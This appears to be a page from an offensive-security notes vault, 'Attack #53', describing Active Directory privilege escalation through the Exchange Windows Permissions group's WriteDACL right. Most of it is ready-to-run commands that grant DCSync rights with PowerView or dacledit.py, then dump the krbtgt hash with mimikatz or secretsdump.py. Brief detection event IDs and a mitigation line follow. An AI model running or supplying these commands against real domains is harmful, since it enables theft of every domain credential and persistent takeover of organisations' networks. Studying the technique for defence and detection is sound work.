attack-53-exchange-windows-permissions-writedacl-to-dcsync.md (3436B)
1 --- 2 title: "Attack #53 β Exchange Windows Permissions (WriteDACL to DCSync)" 3 description: "In many environments, the Exchange Windows Permissions security group has WriteDACL on the domain root object. This is a well-known legacyβ¦" 4 category: active-directory 5 subcategory: "Privilege & Group Abuse" 6 tags: ["active-directory", "credential-access"] 7 tools: ["Impacket", "Mimikatz", "PowerShell"] 8 difficulty: advanced 9 updated: "2026-08-10" 10 source: "vault:ActiveDirectory/AD-Attack/Category-Six/π£ Attack #53 β Exchange Windows Permissions (WriteDACL to DCSync).md" 11 --- 12 # π£ Attack #53 β Exchange Windows Permissions (WriteDACL β DCSync) 13 14 *** 15 16 ## π How It Works 17 18 In many environments, the **Exchange Windows Permissions** security group has **WriteDACL** on the domain root object. This is a well-known legacy misconfiguration from Exchange Server installation. Any member of this group (or anyone who compromises a member) can grant themselves DCSync rights and extract every credential in the domain. 19 20 *** 21 22 ## βοΈ Prerequisites 23 24 | Requirement | Detail | 25 |---|---| 26 | **Membership in Exchange Windows Permissions** | Or compromise of a member | 27 | **WriteDACL on domain root** | Default after Exchange installation | 28 29 *** 30 31 ## π» Full Commands 32 33 ```powershell 34 # ββ Check if Exchange Windows Permissions has WriteDACL on domain βββββββββββββ 35 Get-ObjectAcl "DC=corp,DC=local" -ResolveGUIDs | Where-Object { 36 $_.IdentityReference -match "Exchange Windows Permissions" 37 } | Select-Object ActiveDirectoryRights 38 39 # ββ Grant DCSync rights ββββββββββββββββββββββββββββββββββββββββββββββββββββββ 40 Add-DomainObjectAcl -TargetIdentity "DC=corp,DC=local" \ 41 -PrincipalIdentity compromised_exchange_user -Rights DCSync 42 43 # ββ DCSync ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ 44 mimikatz.exe "lsadump::dcsync /domain:corp.local /user:krbtgt" exit 45 ``` 46 47 ```bash 48 # ββ Linux βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ 49 dacledit.py -action write -rights DCSync \ 50 -principal compromised_user -target-dn "DC=corp,DC=local" \ 51 corp.local/compromised_user:'Password1' -dc-ip 10.10.10.10 52 53 secretsdump.py corp.local/compromised_user:'Password1'@DC01.corp.local \ 54 -just-dc-user krbtgt 55 ``` 56 57 *** 58 59 ## π‘οΈ Detection β Event IDs 60 61 | Event ID | Source | What to Look For | 62 |---|---|---| 63 | **5136** | Security Log (DC) | DACL modification on domain root object | 64 | **4662** | Security Log (DC) | Replication rights used | 65 66 *** 67 68 ## π Attack Chain Context 69 70 ``` 71 [Exchange Permissions] βββ WriteDACL on domain root β DCSync 72 β 73 ββββ π Compromise Exchange admin β WriteDACL β DCSync β Golden Ticket 74 ββββ π Legacy misconfiguration from Exchange Server setup 75 ββββ π Defeated by: remove WriteDACL from Exchange groups, audit domain ACLs 76 ``` 77 78 *** 79 80 > β **Attack #53 β Exchange Windows Permissions complete.** 81 82 *** 83 84 > π **Category 6 β Privilege Escalation is now COMPLETE (9/9 attacks).**